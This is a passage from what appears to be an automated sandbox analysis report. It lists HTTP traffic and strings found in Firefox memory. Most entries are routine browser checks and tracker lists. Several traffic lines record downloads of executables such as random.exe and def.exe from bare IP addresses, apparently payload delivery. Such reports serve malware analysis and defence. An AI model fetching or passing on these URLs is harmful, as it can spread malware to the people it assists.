Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Thu, 19 Dec 2024 08:26:05 GMTIf-None-Match: "6763d89d-1a3200"
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache

Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3344466497.000001F4C3C55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3344466497.000001F4C3C55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: moz-extension://6edd4cbe-8a9f-4158-beca-90f5feba9c8c/lib/custom_functions.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: moz-extension://6edd4cbe-8a9f-4158-beca-90f5feba9c8c/lib/custom_functions.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: moz-extension://6edd4cbe-8a9f-4158-beca-90f5feba9c8c/lib/custom_functions.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POSThttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3344466497.000001F4C3C55000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Wikipedia"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Reddit"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Twitter"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3399651010.000001F4CEB03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3399651010.000001F4CEB03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3376613883.000001F4C894B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3376613883.000001F4C891B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3376613883.000001F4C8986000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Got invalid request to save JSON dataJSON Viewer's onSave failed in startPersistenceNo callback set for this channel.get FIXUP_FLAGS_MAKE_ALTERNATE_URIdevtools.performance.recording.ui-base-urlFailed to listen. Listener already attached.Failed to listen. Callback argument missing.WebChannel/this._originCheckCallbackdevtools.performance.popup.feature-flag@mozilla.org/uriloader/handler-service;1resource://devtools/server/devtools-server.jsDevTools telemetry entry point failed: Failed to execute WebChannel callback:^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$@mozilla.org/network/protocol;1?name=defaultdevtools/client/framework/devtoolsdevtools/client/framework/devtools-browserUnable to start devtools server on @mozilla.org/dom/slow-script-debug;1@mozilla.org/network/protocol;1?name=filebrowser.fixup.dns_first_for_single_wordsbrowser.urlbar.dnsResolveFullyQualifiedNames^([a-z+.-]+:\/{0,3})([^\/@]+@).+^([a-z][a-z0-9.+\t-])(:\|;)?(\/\/)?^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]\|$)browser.fixup.domainsuffixwhitelist.get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPDevToolsStartup.jsm:handleDebuggerFlagresource://devtools/shared/security/socket.js{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}releaseDistinctSystemPrincipalLoaderdevtools.debugger.remote-websocketresource://gre/modules/URIFixup.sys.mjsget FIXUP_FLAG_FORCE_ALTERNATE_URI@mozilla.org/uriloader/dbus-handler-app;1Can't invoke URIFixup in the content processresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/JSONFile.sys.mjshttp://www.inbox.lv/rfc2368/?value=%s@mozilla.org/network/file-input-stream;1resource://gre/modules/JSONFile.sys.mjs{c6cf88b7-452e-47eb-bdc9-86e3561648ef}http://compose.mail.yahoo.co.jp/ym/Compose?To=%sgecko.handlerService.defaultHandlersVersionhttp://poczta.interia.pl/mh/?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc fillHandlerInfo: don't know this type{33d75835-722f-42c0-89cc-44f328e56a86}https://mail.inbox.lv/compose?to=%s_injectDefaultProtocolHandlersIfNeededhttps://poczta.interia.pl/mh/?mailto=%sextractScheme/fixupChangedProtocol<http://win.mail.ru/cgi-bin/sentmsg?mailto=%sisDownloadsImprovementsAlreadyMigrated@mozilla.org/uriloader/web-handler-app;1resource://gre/modules/DeferredTask.sys.mjsScheme should be either http or https@mozilla.org/uriloader/local-handler-app;1resource://gre/modules/FileUtils.sys.mjsresource://gre/modules/NetUtil.sys.mjs_finalizeInternal/this._finalizePromise<https://mail.yahoo.co.jp/compose/?To=%sresource://gre/modules/XPCOMUtils.sys.mjs equals www.yahoo.com (Yahoo)
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3376026938.000001F4C8803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3376026938.000001F4C8803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3340270619.000001F4C2E56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", 